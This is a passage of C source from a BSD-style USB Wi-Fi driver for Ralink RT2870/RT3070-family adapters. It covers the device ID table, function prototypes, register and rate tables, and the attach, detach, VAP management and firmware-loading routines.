RUN_DEV(ENCORE, RT3070_1), RUN_DEV(ENCORE, RT3070_2), RUN_DEV(ENCORE, RT3070_3), RUN_DEV(GIGABYTE, GNWB31N), RUN_DEV(GIGABYTE, GNWB32L), RUN_DEV(GIGABYTE, RT2870_1), RUN_DEV(GIGASET, RT3070_1), RUN_DEV(GIGASET, RT3070_2), RUN_DEV(GUILLEMOT, HWNU300), RUN_DEV(HAWKING, HWUN2), RUN_DEV(HAWKING, RT2870_1), RUN_DEV(HAWKING, RT2870_2), RUN_DEV(HAWKING, RT3070), RUN_DEV(IODATA, RT3072_1), RUN_DEV(IODATA, RT3072_2), RUN_DEV(IODATA, RT3072_3), RUN_DEV(IODATA, RT3072_4), RUN_DEV(LINKSYS4, RT3070), RUN_DEV(LINKSYS4, WUSB100), RUN_DEV(LINKSYS4, WUSB54GCV3), RUN_DEV(LINKSYS4, WUSB600N), RUN_DEV(LINKSYS4, WUSB600NV2), RUN_DEV(LOGITEC, RT2870_1), RUN_DEV(LOGITEC, RT2870_2), RUN_DEV(LOGITEC, RT2870_3), RUN_DEV(LOGITEC, LANW300NU2), RUN_DEV(LOGITEC, LANW150NU2), RUN_DEV(LOGITEC, LANW300NU2S), RUN_DEV(MELCO, RT2870_1), RUN_DEV(MELCO, RT2870_2), RUN_DEV(MELCO, WLIUCAG300N), RUN_DEV(MELCO, WLIUCG300N), RUN_DEV(MELCO, WLIUCG301N), RUN_DEV(MELCO, WLIUCGN), RUN_DEV(MELCO, WLIUCGNM), RUN_DEV(MELCO, WLIUCGNM2), RUN_DEV(MOTOROLA4, RT2770), RUN_DEV(MOTOROLA4, RT3070), RUN_DEV(MSI, RT3070_1), RUN_DEV(MSI, RT3070_2), RUN_DEV(MSI, RT3070_3), RUN_DEV(MSI, RT3070_4), RUN_DEV(MSI, RT3070_5), RUN_DEV(MSI, RT3070_6), RUN_DEV(MSI, RT3070_7), RUN_DEV(MSI, RT3070_8), RUN_DEV(MSI, RT3070_9), RUN_DEV(MSI, RT3070_10), RUN_DEV(MSI, RT3070_11), RUN_DEV(OVISLINK, RT3072), RUN_DEV(PARA, RT3070), RUN_DEV(PEGATRON, RT2870), RUN_DEV(PEGATRON, RT3070), RUN_DEV(PEGATRON, RT3070_2), RUN_DEV(PEGATRON, RT3070_3), RUN_DEV(PHILIPS, RT2870), RUN_DEV(PLANEX2, GWUS300MINIS), RUN_DEV(PLANEX2, GWUSMICRON), RUN_DEV(PLANEX2, RT2870), RUN_DEV(PLANEX2, RT3070), RUN_DEV(QCOM, RT2870), RUN_DEV(QUANTA, RT3070), RUN_DEV(RALINK, RT2070), RUN_DEV(RALINK, RT2770), RUN_DEV(RALINK, RT2870), RUN_DEV(RALINK, RT3070), RUN_DEV(RALINK, RT3071), RUN_DEV(RALINK, RT3072), RUN_DEV(RALINK, RT3370), RUN_DEV(RALINK, RT3572), RUN_DEV(RALINK, RT3573), RUN_DEV(RALINK, RT5370), RUN_DEV(RALINK, RT5572), RUN_DEV(RALINK, RT8070), RUN_DEV(SAMSUNG, WIS09ABGN), RUN_DEV(SAMSUNG2, RT2870_1), RUN_DEV(SENAO, RT2870_1), RUN_DEV(SENAO, RT2870_2), RUN_DEV(SENAO, RT2870_3), RUN_DEV(SENAO, RT2870_4), RUN_DEV(SENAO, RT3070), RUN_DEV(SENAO, RT3071), RUN_DEV(SENAO, RT3072_1), RUN_DEV(SENAO, RT3072_2), RUN_DEV(SENAO, RT3072_3), RUN_DEV(SENAO, RT3072_4), RUN_DEV(SENAO, RT3072_5), RUN_DEV(SITECOMEU, RT2770), RUN_DEV(SITECOMEU, RT2870_1), RUN_DEV(SITECOMEU, RT2870_2), RUN_DEV(SITECOMEU, RT2870_3), RUN_DEV(SITECOMEU, RT2870_4), RUN_DEV(SITECOMEU, RT3070), RUN_DEV(SITECOMEU, RT3070_2), RUN_DEV(SITECOMEU, RT3070_3), RUN_DEV(SITECOMEU, RT3070_4), RUN_DEV(SITECOMEU, RT3071), RUN_DEV(SITECOMEU, RT3072_1), RUN_DEV(SITECOMEU, RT3072_2), RUN_DEV(SITECOMEU, RT3072_3), RUN_DEV(SITECOMEU, RT3072_4), RUN_DEV(SITECOMEU, RT3072_5), RUN_DEV(SITECOMEU, RT3072_6), RUN_DEV(SITECOMEU, WL608), RUN_DEV(SPARKLAN, RT2870_1), RUN_DEV(SPARKLAN, RT3070), RUN_DEV(SWEEX2, LW153), RUN_DEV(SWEEX2, LW303), RUN_DEV(SWEEX2, LW313), RUN_DEV(TOSHIBA, RT3070), RUN_DEV(UMEDIA, RT2870_1), RUN_DEV(ZCOM, RT2870_1), RUN_DEV(ZCOM, RT2870_2), RUN_DEV(ZINWELL, RT2870_1), RUN_DEV(ZINWELL, RT2870_2), RUN_DEV(ZINWELL, RT3070), RUN_DEV(ZINWELL, RT3072_1), RUN_DEV(ZINWELL, RT3072_2), RUN_DEV(ZYXEL, RT2870_1), RUN_DEV(ZYXEL, RT2870_2), RUN_DEV(ZYXEL, NWD2705), RUN_DEV_EJECT(RALINK, RT_STOR), #undef RUN_DEV_EJECT #undef RUN_DEV }; static device_probe_t run_match; static device_attach_t run_attach; static device_detach_t run_detach; static usb_callback_t run_bulk_rx_callback; static usb_callback_t run_bulk_tx_callback0; static usb_callback_t run_bulk_tx_callback1; static usb_callback_t run_bulk_tx_callback2; static usb_callback_t run_bulk_tx_callback3; static usb_callback_t run_bulk_tx_callback4; static usb_callback_t run_bulk_tx_callback5; static void run_autoinst(void *, struct usb_device *, struct usb_attach_arg *); static int run_driver_loaded(struct module *, int, void *); static void run_bulk_tx_callbackN(struct usb_xfer *xfer, usb_error_t error, u_int index); static struct ieee80211vap *run_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void run_vap_delete(struct ieee80211vap *); static void run_cmdq_cb(void *, int); static void run_setup_tx_list(struct run_softc *, struct run_endpoint_queue *); static void run_unsetup_tx_list(struct run_softc *, struct run_endpoint_queue *); static int run_load_microcode(struct run_softc *); static int run_reset(struct run_softc *); static usb_error_t run_do_request(struct run_softc *, struct usb_device_request *, void *); static int run_read(struct run_softc *, uint16_t, uint32_t *); static int run_read_region_1(struct run_softc *, uint16_t, uint8_t *, int); static int run_write_2(struct run_softc *, uint16_t, uint16_t); static int run_write(struct run_softc *, uint16_t, uint32_t); static int run_write_region_1(struct run_softc *, uint16_t, const uint8_t *, int); static int run_set_region_4(struct run_softc *, uint16_t, uint32_t, int); static int run_rf3593_efuse_read_1(struct run_softc *, uint16_t, uint16_t *); static int run_efuse_read(struct run_softc *, uint16_t, uint16_t *, int); static int run_efuse_read_2(struct run_softc *, uint16_t, uint16_t *); static int run_eeprom_read_2(struct run_softc *, uint16_t, uint16_t *); static int run_rt2870_rf_write(struct run_softc *, uint32_t); static int run_rt3070_rf_read(struct run_softc *, uint8_t, uint8_t *); static int run_rt3070_rf_write(struct run_softc *, uint8_t, uint8_t); static int run_bbp_read(struct run_softc *, uint8_t, uint8_t *); static int run_bbp_write(struct run_softc *, uint8_t, uint8_t); static int run_mcu_cmd(struct run_softc *, uint8_t, uint16_t); static const char *run_get_rf(uint16_t); static void run_rt3593_get_txpower(struct run_softc *); static void run_get_txpower(struct run_softc *); static int run_read_eeprom(struct run_softc *); static struct ieee80211_node *run_node_alloc(struct ieee80211vap *, const uint8_t mac[IEEE80211_ADDR_LEN]); static int run_media_change(struct ifnet *); static int run_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int run_wme_update(struct ieee80211com *); static void run_wme_update_cb(void *); static void run_key_update_begin(struct ieee80211vap *); static void run_key_update_end(struct ieee80211vap *); static void run_key_set_cb(void *); static int run_key_set(struct ieee80211vap *, struct ieee80211_key *, const uint8_t mac[IEEE80211_ADDR_LEN]); static void run_key_delete_cb(void *); static int run_key_delete(struct ieee80211vap *, struct ieee80211_key *); static void run_ratectl_to(void *); static void run_ratectl_cb(void *, int); static void run_drain_fifo(void *); static void run_iter_func(void *, struct ieee80211_node *); static void run_newassoc_cb(void *); static void run_newassoc(struct ieee80211_node *, int); static void run_rx_frame(struct run_softc *, struct mbuf *, uint32_t); static void run_tx_free(struct run_endpoint_queue *pq, struct run_tx_data *, int); static void run_set_tx_desc(struct run_softc *, struct run_tx_data *); static int run_tx(struct run_softc *, struct mbuf *, struct ieee80211_node *); static int run_tx_mgt(struct run_softc *, struct mbuf *, struct ieee80211_node *); static int run_sendprot(struct run_softc *, const struct mbuf *, struct ieee80211_node *, int, int); static int run_tx_param(struct run_softc *, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *); static int run_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void run_start(struct ifnet *); static int run_ioctl(struct ifnet *, u_long, caddr_t); static void run_iq_calib(struct run_softc *, u_int); static void run_set_agc(struct run_softc *, uint8_t); static void run_select_chan_group(struct run_softc *, int); static void run_set_rx_antenna(struct run_softc *, int); static void run_rt2870_set_chan(struct run_softc *, u_int); static void run_rt3070_set_chan(struct run_softc *, u_int); static void run_rt3572_set_chan(struct run_softc *, u_int); static void run_rt3593_set_chan(struct run_softc *, u_int); static void run_rt5390_set_chan(struct run_softc *, u_int); static void run_rt5592_set_chan(struct run_softc *, u_int); static int run_set_chan(struct run_softc *, struct ieee80211_channel *); static void run_set_channel(struct ieee80211com *); static void run_scan_start(struct ieee80211com *); static void run_scan_end(struct ieee80211com *); static void run_update_beacon(struct ieee80211vap *, int); static void run_update_beacon_cb(void *); static void run_updateprot(struct ieee80211com *); static void run_updateprot_cb(void *); static void run_usb_timeout_cb(void *); static void run_reset_livelock(struct run_softc *); static void run_enable_tsf_sync(struct run_softc *); static void run_enable_mrr(struct run_softc *); static void run_set_txpreamble(struct run_softc *); static void run_set_basicrates(struct run_softc *); static void run_set_leds(struct run_softc *, uint16_t); static void run_set_bssid(struct run_softc *, const uint8_t *); static void run_set_macaddr(struct run_softc *, const uint8_t *); static void run_updateslot(struct ifnet *); static void run_updateslot_cb(void *); static void run_update_mcast(struct ifnet *); static int8_t run_rssi2dbm(struct run_softc *, uint8_t, uint8_t); static void run_update_promisc_locked(struct ifnet *); static void run_update_promisc(struct ifnet *); static void run_rt5390_bbp_init(struct run_softc *); static int run_bbp_init(struct run_softc *); static int run_rt3070_rf_init(struct run_softc *); static void run_rt3593_rf_init(struct run_softc *); static void run_rt5390_rf_init(struct run_softc *); static int run_rt3070_filter_calib(struct run_softc *, uint8_t, uint8_t, uint8_t *); static void run_rt3070_rf_setup(struct run_softc *); static void run_rt3593_rf_setup(struct run_softc *); static void run_rt5390_rf_setup(struct run_softc *); static int run_txrx_enable(struct run_softc *); static void run_adjust_freq_offset(struct run_softc *); static void run_init(void *); static void run_init_locked(struct run_softc *); static void run_stop(void *); static void run_delay(struct run_softc *, u_int); static eventhandler_tag run_etag; static const struct rt2860_rate { uint8_t rate; uint8_t mcs; enum ieee80211_phytype phy; uint8_t ctl_ridx; uint16_t sp_ack_dur; uint16_t lp_ack_dur; } rt2860_rates[] = { { 2, 0, IEEE80211_T_DS, 0, 314, 314 }, { 4, 1, IEEE80211_T_DS, 1, 258, 162 }, { 11, 2, IEEE80211_T_DS, 2, 223, 127 }, { 22, 3, IEEE80211_T_DS, 3, 213, 117 }, { 12, 0, IEEE80211_T_OFDM, 4, 60, 60 }, { 18, 1, IEEE80211_T_OFDM, 4, 52, 52 }, { 24, 2, IEEE80211_T_OFDM, 6, 48, 48 }, { 36, 3, IEEE80211_T_OFDM, 6, 44, 44 }, { 48, 4, IEEE80211_T_OFDM, 8, 44, 44 }, { 72, 5, IEEE80211_T_OFDM, 8, 40, 40 }, { 96, 6, IEEE80211_T_OFDM, 8, 40, 40 }, { 108, 7, IEEE80211_T_OFDM, 8, 40, 40 } }; static const struct { uint16_t reg; uint32_t val; } rt2870_def_mac[] = { RT2870_DEF_MAC }; static const struct { uint8_t reg; uint8_t val; } rt2860_def_bbp[] = { RT2860_DEF_BBP },rt5390_def_bbp[] = { RT5390_DEF_BBP },rt5592_def_bbp[] = { RT5592_DEF_BBP }; /* * Default values for BBP register R196 for RT5592. */ static const uint8_t rt5592_bbp_r196[] = { 0xe0, 0x1f, 0x38, 0x32, 0x08, 0x28, 0x19, 0x0a, 0xff, 0x00, 0x16, 0x10, 0x10, 0x0b, 0x36, 0x2c, 0x26, 0x24, 0x42, 0x36, 0x30, 0x2d, 0x4c, 0x46, 0x3d, 0x40, 0x3e, 0x42, 0x3d, 0x40, 0x3c, 0x34, 0x2c, 0x2f, 0x3c, 0x35, 0x2e, 0x2a, 0x49, 0x41, 0x36, 0x31, 0x30, 0x30, 0x0e, 0x0d, 0x28, 0x21, 0x1c, 0x16, 0x50, 0x4a, 0x43, 0x40, 0x10, 0x10, 0x10, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7d, 0x14, 0x32, 0x2c, 0x36, 0x4c, 0x43, 0x2c, 0x2e, 0x36, 0x30, 0x6e }; static const struct rfprog { uint8_t chan; uint32_t r1, r2, r3, r4; } rt2860_rf2850[] = { RT2860_RF2850 }; struct { uint8_t n, r, k; } rt3070_freqs[] = { RT3070_RF3052 }; static const struct rt5592_freqs { uint16_t n; uint8_t k, m, r; } rt5592_freqs_20mhz[] = { RT5592_RF5592_20MHZ },rt5592_freqs_40mhz[] = { RT5592_RF5592_40MHZ }; static const struct { uint8_t reg; uint8_t val; } rt3070_def_rf[] = { RT3070_DEF_RF },rt3572_def_rf[] = { RT3572_DEF_RF },rt3593_def_rf[] = { RT3593_DEF_RF },rt5390_def_rf[] = { RT5390_DEF_RF },rt5392_def_rf[] = { RT5392_DEF_RF },rt5592_def_rf[] = { RT5592_DEF_RF },rt5592_2ghz_def_rf[] = { RT5592_2GHZ_DEF_RF },rt5592_5ghz_def_rf[] = { RT5592_5GHZ_DEF_RF }; static const struct { u_int firstchan; u_int lastchan; uint8_t reg; uint8_t val; } rt5592_chan_5ghz[] = { RT5592_CHAN_5GHZ }; static const struct usb_config run_config[RUN_N_XFER] = { [RUN_BULK_TX_BE] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .ep_index = 0, .direction = UE_DIR_OUT, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = run_bulk_tx_callback0, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_BK] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 1, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = run_bulk_tx_callback1, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_VI] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 2, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = run_bulk_tx_callback2, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_VO] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 3, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = run_bulk_tx_callback3, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_HCCA] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 4, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,.no_pipe_ok = 1,}, .callback = run_bulk_tx_callback4, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_PRIO] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 5, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,.no_pipe_ok = 1,}, .callback = run_bulk_tx_callback5, .timeout = 5000, /* ms */ }, [RUN_BULK_RX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = RUN_MAX_RXSZ, .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = run_bulk_rx_callback, } }; static void run_autoinst(void *arg, struct usb_device *udev, struct usb_attach_arg *uaa) { struct usb_interface *iface; struct usb_interface_descriptor *id; if (uaa->dev_state != UAA_DEV_READY) return; iface = usbd_get_iface(udev, 0); if (iface == NULL) return; id = iface->idesc; if (id == NULL || id->bInterfaceClass != UICLASS_MASS) return; if (usbd_lookup_id_by_uaa(run_devs, sizeof(run_devs), uaa)) return; if (usb_msc_eject(udev, 0, MSC_EJECT_STOPUNIT) == 0) uaa->dev_state = UAA_DEV_EJECTING; } static int run_driver_loaded(struct module *mod, int what, void *arg) { switch (what) { case MOD_LOAD: run_etag = EVENTHANDLER_REGISTER(usb_dev_configured, run_autoinst, NULL, EVENTHANDLER_PRI_ANY); break; case MOD_UNLOAD: EVENTHANDLER_DEREGISTER(usb_dev_configured, run_etag); break; default: return (EOPNOTSUPP); } return (0); } static int run_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != 0) return (ENXIO); if (uaa->info.bIfaceIndex != RT2860_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(run_devs, sizeof(run_devs), uaa)); } static int run_attach(device_t self) { struct run_softc *sc = device_get_softc(self); struct usb_attach_arg *uaa = device_get_ivars(self); struct ieee80211com *ic; struct ifnet *ifp; uint32_t ver; int ntries, error; uint8_t iface_index, bands; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); iface_index = RT2860_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, run_config, RUN_N_XFER, sc, &sc->sc_mtx); if (error) { device_printf(self, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } RUN_LOCK(sc); /* wait for the chip to settle */ for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_ASIC_VER_ID, &ver) != 0) { RUN_UNLOCK(sc); goto detach; } if (ver != 0 && ver != 0xffffffff) break; run_delay(sc, 10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for NIC to initialize\n"); RUN_UNLOCK(sc); goto detach; } sc->mac_ver = ver >> 16; sc->mac_rev = ver & 0xffff; /* retrieve RF rev. no and various other things from EEPROM */ run_read_eeprom(sc); device_printf(sc->sc_dev, "MAC/BBP RT%04X (rev 0x%04X), RF %s (MIMO %dT%dR), address %s\n", sc->mac_ver, sc->mac_rev, run_get_rf(sc->rf_rev), sc->ntxchains, sc->nrxchains, ether_sprintf(sc->sc_bssid)); RUN_UNLOCK(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "run", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = run_init; ifp->if_ioctl = run_ioctl; ifp->if_start = run_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA | /* station mode supported */ IEEE80211_C_MONITOR | /* monitor mode supported */ IEEE80211_C_IBSS | IEEE80211_C_HOSTAP | IEEE80211_C_WDS | /* 4-address traffic works */ IEEE80211_C_MBSS | IEEE80211_C_SHPREAMBLE | /* short preamble supported */ IEEE80211_C_SHSLOT | /* short slot time supported */ IEEE80211_C_WME | /* WME */ IEEE80211_C_WPA; /* WPA1|WPA2(RSN) */ ic->ic_cryptocaps = IEEE80211_CRYPTO_WEP | IEEE80211_CRYPTO_AES_CCM | IEEE80211_CRYPTO_TKIPMIC | IEEE80211_CRYPTO_TKIP; ic->ic_flags |= IEEE80211_F_DATAPAD; ic->ic_flags_ext |= IEEE80211_FEXT_SWBMISS; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2860_RF_2750 || sc->rf_rev == RT2860_RF_2850 || sc->rf_rev == RT3070_RF_3052 || sc->rf_rev == RT3593_RF_3053 || sc->rf_rev == RT5592_RF_5592) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_scan_start = run_scan_start; ic->ic_scan_end = run_scan_end; ic->ic_set_channel = run_set_channel; ic->ic_node_alloc = run_node_alloc; ic->ic_newassoc = run_newassoc; ic->ic_updateslot = run_updateslot; ic->ic_update_mcast = run_update_mcast; ic->ic_wme.wme_update = run_wme_update; ic->ic_raw_xmit = run_raw_xmit; ic->ic_update_promisc = run_update_promisc; ic->ic_vap_create = run_vap_create; ic->ic_vap_delete = run_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RUN_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RUN_RX_RADIOTAP_PRESENT); TASK_INIT(&sc->cmdq_task, 0, run_cmdq_cb, sc); TASK_INIT(&sc->ratectl_task, 0, run_ratectl_cb, sc); usb_callout_init_mtx(&sc->ratectl_ch, &sc->sc_mtx, 0); if (bootverbose) ieee80211_announce(ic); return (0); detach: run_detach(self); return (ENXIO); } static int run_detach(device_t self) { struct run_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; int i; RUN_LOCK(sc); sc->sc_detached = 1; RUN_UNLOCK(sc); /* stop all USB transfers */ usbd_transfer_unsetup(sc->sc_xfer, RUN_N_XFER); RUN_LOCK(sc); sc->ratectl_run = RUN_RATECTL_OFF; sc->cmdq_run = sc->cmdq_key_set = RUN_CMDQ_ABORT; /* free TX list, if any */ for (i = 0; i != RUN_EP_QUEUES; i++) run_unsetup_tx_list(sc, &sc->sc_epq[i]); RUN_UNLOCK(sc); if (ifp) { ic = ifp->if_l2com; /* drain tasks */ usb_callout_drain(&sc->ratectl_ch); ieee80211_draintask(ic, &sc->cmdq_task); ieee80211_draintask(ic, &sc->ratectl_task); ieee80211_ifdetach(ic); if_free(ifp); } mtx_destroy(&sc->sc_mtx); return (0); } static struct ieee80211vap * run_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct run_softc *sc = ifp->if_softc; struct run_vap *rvp; struct ieee80211vap *vap; int i; if (sc->rvp_cnt >= RUN_VAP_MAX) { if_printf(ifp, "number of VAPs maxed out\n"); return (NULL); } switch (opmode) { case IEEE80211_M_STA: /* enable s/w bmiss handling for sta mode */ flags |= IEEE80211_CLONE_NOBEACONS; /* fall though */ case IEEE80211_M_IBSS: case IEEE80211_M_MONITOR: case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: /* other than WDS vaps, only one at a time */ if (!TAILQ_EMPTY(&ic->ic_vaps)) return (NULL); break; case IEEE80211_M_WDS: TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next){ if(vap->iv_opmode != IEEE80211_M_HOSTAP) continue; /* WDS vap's always share the local mac address. */ flags &= ~IEEE80211_CLONE_BSSID; break; } if (vap == NULL) { if_printf(ifp, "wds only supported in ap mode\n"); return (NULL); } break; default: if_printf(ifp, "unknown opmode %d\n", opmode); return (NULL); } rvp = (struct run_vap *) malloc(sizeof(struct run_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return (NULL); vap = &rvp->vap; if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac) != 0) { /* out of memory */ free(rvp, M_80211_VAP); return (NULL); } vap->iv_key_update_begin = run_key_update_begin; vap->iv_key_update_end = run_key_update_end; vap->iv_update_beacon = run_update_beacon; vap->iv_max_aid = RT2870_WCID_MAX; /* * To delete the right key from h/w, we need wcid. * Luckily, there is unused space in ieee80211_key{}, wk_pad, * and matching wcid will be written into there. So, cast * some spells to remove 'const' from ieee80211_key{} */ vap->iv_key_delete = (void *)run_key_delete; vap->iv_key_set = (void *)run_key_set; /* override state transition machine */ rvp->newstate = vap->iv_newstate; vap->iv_newstate = run_newstate; ieee80211_ratectl_init(vap); ieee80211_ratectl_setinterval(vap, 1000 /* 1 sec */); /* complete setup */ ieee80211_vap_attach(vap, run_media_change, ieee80211_media_status); /* make sure id is always unique */ for (i = 0; i < RUN_VAP_MAX; i++) { if((sc->rvp_bmap & 1 << i) == 0){ sc->rvp_bmap |= 1 << i; rvp->rvp_id = i; break; } } if (sc->rvp_cnt++ == 0) ic->ic_opmode = opmode; if (opmode == IEEE80211_M_HOSTAP) sc->cmdq_run = RUN_CMDQ_GO; DPRINTF("rvp_id=%d bmap=%x rvp_cnt=%d\n", rvp->rvp_id, sc->rvp_bmap, sc->rvp_cnt); return (vap); } static void run_vap_delete(struct ieee80211vap *vap) { struct run_vap *rvp = RUN_VAP(vap); struct ifnet *ifp; struct ieee80211com *ic; struct run_softc *sc; uint8_t rvp_id; if (vap == NULL) return; ic = vap->iv_ic; ifp = ic->ic_ifp; sc = ifp->if_softc; RUN_LOCK(sc); m_freem(rvp->beacon_mbuf); rvp->beacon_mbuf = NULL; rvp_id = rvp->rvp_id; sc->ratectl_run &= ~(1 << rvp_id); sc->rvp_bmap &= ~(1 << rvp_id); run_set_region_4(sc, RT2860_SKEY(rvp_id, 0), 0, 128); run_set_region_4(sc, RT2860_BCN_BASE(rvp_id), 0, 512); --sc->rvp_cnt; DPRINTF("vap=%p rvp_id=%d bmap=%x rvp_cnt=%d\n", vap, rvp_id, sc->rvp_bmap, sc->rvp_cnt); RUN_UNLOCK(sc); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } /* * There are numbers of functions need to be called in context thread. * Rather than creating taskqueue event for each of those functions, * here is all-for-one taskqueue callback function. This function * gurantees deferred functions are executed in the same order they * were enqueued. * '& RUN_CMDQ_MASQ' is to loop cmdq[]. */ static void run_cmdq_cb(void *arg, int pending) { struct run_softc *sc = arg; uint8_t i; /* call cmdq[].func locked */ RUN_LOCK(sc); for (i = sc->cmdq_exec; sc->cmdq[i].func && pending; i = sc->cmdq_exec, pending--) { DPRINTFN(6, "cmdq_exec=%d pending=%d\n", i, pending); if (sc->cmdq_run == RUN_CMDQ_GO) { /* * If arg0 is NULL, callback func needs more * than one arg. So, pass ptr to cmdq struct. */ if (sc->cmdq[i].arg0) sc->cmdq[i].func(sc->cmdq[i].arg0); else sc->cmdq[i].func(&sc->cmdq[i]); } sc->cmdq[i].arg0 = NULL; sc->cmdq[i].func = NULL; sc->cmdq_exec++; sc->cmdq_exec &= RUN_CMDQ_MASQ; } RUN_UNLOCK(sc); } static void run_setup_tx_list(struct run_softc *sc, struct run_endpoint_queue *pq) { struct run_tx_data *data; memset(pq, 0, sizeof(*pq)); STAILQ_INIT(&pq->tx_qh); STAILQ_INIT(&pq->tx_fh); for (data = &pq->tx_data[0]; data < &pq->tx_data[RUN_TX_RING_COUNT]; data++) { data->sc = sc; STAILQ_INSERT_TAIL(&pq->tx_fh, data, next); } pq->tx_nfree = RUN_TX_RING_COUNT; } static void run_unsetup_tx_list(struct run_softc *sc, struct run_endpoint_queue *pq) { struct run_tx_data *data; /* make sure any subsequent use of the queues will fail */ pq->tx_nfree = 0; STAILQ_INIT(&pq->tx_fh); STAILQ_INIT(&pq->tx_qh); /* free up all node references and mbufs */ for (data = &pq->tx_data[0]; data < &pq->tx_data[RUN_TX_RING_COUNT]; data++) { if (data->m != NULL) { m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } } static int run_load_microcode(struct run_softc *sc) { usb_device_request_t req; const struct firmware *fw; const u_char *base; uint32_t tmp; int ntries, error; const uint64_t *temp; uint64_t bytes; RUN_UNLOCK(sc); fw = firmware_get("runfw"); RUN_LOCK(sc); if (fw == NULL) { device_printf(sc->sc_dev, "failed loadfirmware of file %s\n", "runfw"); return ENOENT; } if (fw->datasize != 8192) { device_printf(sc->sc_dev, "invalid firmware size (should be 8KB)\n"); error = EINVAL; goto fail; } /* * RT3071/RT3072 use a different firmware * run-rt2870 (8KB) contains both, * first half (4KB) is for rt2870, * last half is for rt3071. */ base = fw->data; if ((sc->mac_ver) != 0x2860 && (sc->mac_ver) != 0x2872 && (sc->mac_ver) != 0x3070) { base += 4096; } /* cheap sanity check */ temp = fw->data; bytes = *temp; if (bytes != be64toh(0xffffff0210280210ULL)) { device_printf(sc->sc_dev, "firmware checksum failed\n"); error = EINVAL; goto fail; } /* write microcode image */ if (sc->mac_ver != 0x3593) { run_write_region_1(sc, RT2870_FW_BASE, base, 4096); run_write(sc, RT2860_H2M_MAILBOX_CID, 0xffffffff); run_write(sc, RT2860_H2M_MAILBOX_STATUS, 0xffffffff); } req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2870_RESET; 